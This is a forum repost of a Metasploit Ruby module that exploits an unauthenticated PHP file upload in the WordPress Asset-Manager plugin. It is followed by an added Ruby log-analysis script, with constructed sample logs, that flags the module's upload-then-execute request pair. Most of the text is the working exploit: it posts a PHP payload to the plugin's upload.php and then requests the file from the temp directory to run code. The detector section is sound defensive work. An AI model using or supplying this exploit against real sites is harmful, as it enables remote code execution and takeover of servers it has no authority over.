WordPress Asset-Manager PHP File Upload Vulnerability

Original poster | Posted on 2012-12-31 09:22:33
This module, from the Metasploit exploit library, exploits a vulnerability found in the Asset-Manager plugin for WordPress, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which leads to arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body the plugin's upload.php expects (field "Filedata")
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    # Step 1: unauthenticated POST to the plugin's upload handler
    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Step 2: request the uploaded file from the web-accessible temp directory
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
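Added example, not part of the original post or of the Metasploit module above: a small Ruby log check that flags the two-request sequence the module produces, a successful POST to the plugin's upload.php followed from the same client by a request for a .php file under wp-content/uploads/assets/temp. The combined log format, the client addresses and the uploaded file name are assumed or constructed for the demonstration.

```ruby
# Added example (not part of the original post or the Metasploit module):
# correlate, per client IP, a successful POST to the Asset-Manager upload.php
# with a later GET for a .php file under uploads/assets/temp, the sequence the
# module above performs.
require 'time'

UPLOAD_RE = %r{POST \S*/wp-content/plugins/asset-manager/upload\.php}
EXEC_RE   = %r{GET (\S*/wp-content/uploads/assets/temp/[^/\s]+\.php)}
# Combined-log format (assumed): ip - - [time] "METHOD path proto" status size
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})/

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    request: m[3], status: m[4].to_i }
end

# Returns one alert per request for a temp-dir .php that follows, within
# `window` seconds, a 200 response to upload.php from the same client.
def find_upload_exec(lines, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] }   # ip => [upload times]
  alerts = []
  lines.each do |line|
    ev = parse_line(line) or next
    if ev[:request] =~ UPLOAD_RE && ev[:status] == 200
      uploads[ev[:ip]] << ev[:time]
    elsif (m = EXEC_RE.match(ev[:request]))
      hit = uploads[ev[:ip]].find { |t| (ev[:time] - t).between?(0, window) }
      alerts << { ip: ev[:ip], file: m[1], status: ev[:status] } if hit
    end
  end
  alerts
end

# Constructed sample log: 203.0.113.5 performs upload then GET;
# 198.51.100.9 fetches an image and probes a name it never uploaded.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [31/Dec/2012:09:20:01 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57
  203.0.113.5 - - [31/Dec/2012:09:20:02 +0800] "GET /wordpress/wp-content/uploads/assets/temp/qzkfa.php HTTP/1.1" 200 12
  198.51.100.9 - - [31/Dec/2012:09:21:10 +0800] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 8123
  198.51.100.9 - - [31/Dec/2012:09:22:00 +0800] "GET /wordpress/wp-content/uploads/assets/temp/qzkfa.php HTTP/1.1" 404 0
LOG

if __FILE__ == $0
  find_upload_exec(SAMPLE_LOG.lines).each do |a|
    puts "ALERT #{a[:ip]} uploaded and then requested #{a[:file]} (HTTP #{a[:status]})"
  end
end
```

Only the client that both uploaded and fetched is reported; a lone request for a .php name under the temp directory (the second client's 404) is left for a separate, lower-confidence rule.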